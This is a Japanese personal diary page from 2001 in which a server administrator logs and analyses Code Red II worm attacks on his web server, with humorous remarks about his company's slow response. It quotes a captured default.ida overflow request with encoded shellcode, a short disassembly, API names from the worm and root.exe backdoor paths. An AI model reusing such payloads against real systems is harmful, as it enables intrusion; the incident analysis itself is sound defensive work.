These pages are written by only Japanese.
|
Namazu for hns による簡易全文検索です。 詳細は 詳細指定/ヘルプをご参照下さい。 |
||||||||||||||||||||||||||||||||||||||||||||||||
※ 一部を抜粋 → %u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078 90 nop 81C300030000 add ebx,0x300 8B1B mov ebx,[ebx] 53 push ebx FF5378 call near [ebx+0x78]多分、CGI の入力で受け取ったデータを、実行コードとして呼び出して いるんじゃないかと思う。
echo あなたのサーバはクラックされていませんか? | nkf -Es > $HTTP_DOCUMENT_ROOT/default.ida
www.melmo.ne.jp - - [05/Aug/2001:15:45:26 +0900] "GET /default.ida?XXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090 %u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 43 これ ~~~さて、あちらさんは成功したと思っているのだろうか。 しばらく、このままにしておこう。
CodeRedII,KERN LoadLibraryA,CreateThread,GetTickCount,Sleep GetSystemDirectory,CopyFileA,GlobalFindAtomA,GlobalAddAtomA TcpLen,CloseHandle _lcreat,_lwrite,_lclose GetSystemTime WS2_32.DLL,socket,closesocket,ioctlsocket,connect,select,send,recv gethostname,gethostbyname,WSAGetLastError USER32.DLL,ExitWindowsEx \CMD.EXE d:\inetpub\scripts\root.exe, d:\progra~1\common~1\system\MSADC\root.exe「以上の API群を用いて、Windows に感染するワームを作りなさい」 ってのは、プログラミング演習の課題にぴったりかも。(ぉ
tune$ grep default.ida $HTTP_LOG_DIR/httpd-access.log | \ perl -F: -ane '{print$1, "\n", if (/(\S+)/)}' | \ sort | ./repet_count.pl | sort -r 14 210.177.62.227 12 210.251.80.54 9 sagami143025.allnet.ne.jp 9 211.202.42.16 8 webdepot.ne.jp ...<ずらっと>cron にこれをしかけて、10分単位で自動更新させてみた。 ついでに、棒グラフにしてみる。 ってな訳で、さらしもの〜 (^-^
c:\inetpub\scripts\root.exe c:\progra~1\common~1\system\MSADC\root.exeげっ.まずい... # こっそり証拠隠滅 :-)
「yoya: あの〜。俺の管理してるサーバがワームに感染したと思われる ホストから攻撃されまくってるんだけど、10時位から、 今、ネットワークが不安定なのと関係あるんじゃない?」 「管理部署: 本日、ネットワーク管理者が出張に出かけておりまして...」 「yoya: 他に分かる人おらんのか?」 「管理部署: 彼一人しか分かりません...」 「yoya: あんたん所、管理部門だろうが。ふざけんな。ゴルァ( ゜Д゜)」
最近、流行りの Code Red II が社内にウヨウヨしてるんとちゃう? このワームは1人2人直しても埓あかん性質の物だし、 そっちが号令かけてやってもらわないと、ダメなんじゃないの? ログ送るから、目ぇかっ開いてよく見た後、 とっとと返事よこせや。コラ!といった感じのメールを書いた所、 1時間経ってその人から社員全員宛てのメールが届く。
Code Red II というワームが社内に蔓延してるので、パッチあててね♪ パッチあてる手順 ・まずケーブルを抜きましょう ・以下の場所からパッチを取って来ます。http://www.microsoft.〜<以下略>それに対する周りの反応
ケーブル抜いたらパッチ取ってこれないじゃん っつーか、ネットワークが使えないって言ってるんだろ。 何ねぼけてるんだ。こいつは...その後、パッチが添付されたメールが届きました...